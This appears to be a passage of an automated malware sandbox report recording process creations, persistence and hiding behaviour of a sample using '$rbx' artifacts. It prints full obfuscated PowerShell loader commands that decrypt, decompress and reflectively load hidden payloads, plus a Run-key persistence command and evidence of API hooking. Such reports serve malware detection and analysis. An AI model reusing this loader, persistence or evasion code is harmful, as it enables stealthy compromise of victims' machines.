Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeCode function: 20_2_000002527DEE1E3C LoadLibraryA,GetProcAddress,SleepEx,20_2_000002527DEE1E3C
Source: C:\Windows\System32\cmd.exeCode function: 20_3_000002527DECA7DD push rcx; retf 003Fh20_3_000002527DECA7DE
Source: C:\Windows\System32\conhost.exeCode function: 21_3_00000286D7CFA7DD push rcx; retf 003Fh21_3_00000286D7CFA7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAAB8671C7 push ebp; retf 39_2_00007FFAAB8671C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_00007FFAABA171BA push ecx; retf 39_2_00007FFAABA171CC
Source: C:\Windows\System32\conhost.exeCode function: 40_3_000001D54781A7DD push rcx; retf 003Fh40_3_000001D54781A7DE
Source: C:\Windows\System32\dllhost.exeCode function: 41_3_000001EF0920A7DD push rcx; retf 003Fh41_3_000001EF0920A7DE
Source: C:\Windows\System32\winlogon.exeCode function: 42_3_000001CA7D1CA7DD push rcx; retf 003Fh42_3_000001CA7D1CA7DE
Source: C:\Windows\System32\lsass.exeCode function: 43_3_0000017D2DD3A7DD push rcx; retf 003Fh43_3_0000017D2DD3A7DE
Source: C:\Windows\System32\svchost.exeCode function: 44_3_0000022F4B93A7DD push rcx; retf 003Fh44_3_0000022F4B93A7DE
Source: C:\Windows\System32\dwm.exeCode function: 45_3_00000262F1CEA7DD push rcx; retf 003Fh45_3_00000262F1CEA7DE
Source: C:\Windows\System32\dwm.exeCode function: 45_3_00000262F1CBA7DD push rcx; retf 003Fh45_3_00000262F1CBA7DE
Source: C:\Windows\System32\svchost.exeCode function: 46_3_0000023942AFA7DD push rcx; retf 003Fh46_3_0000023942AFA7DE
Source: C:\Windows\System32\svchost.exeCode function: 47_3_000001EF056BA7DD push rcx; retf 003Fh47_3_000001EF056BA7DE

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-9pdB1aHK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
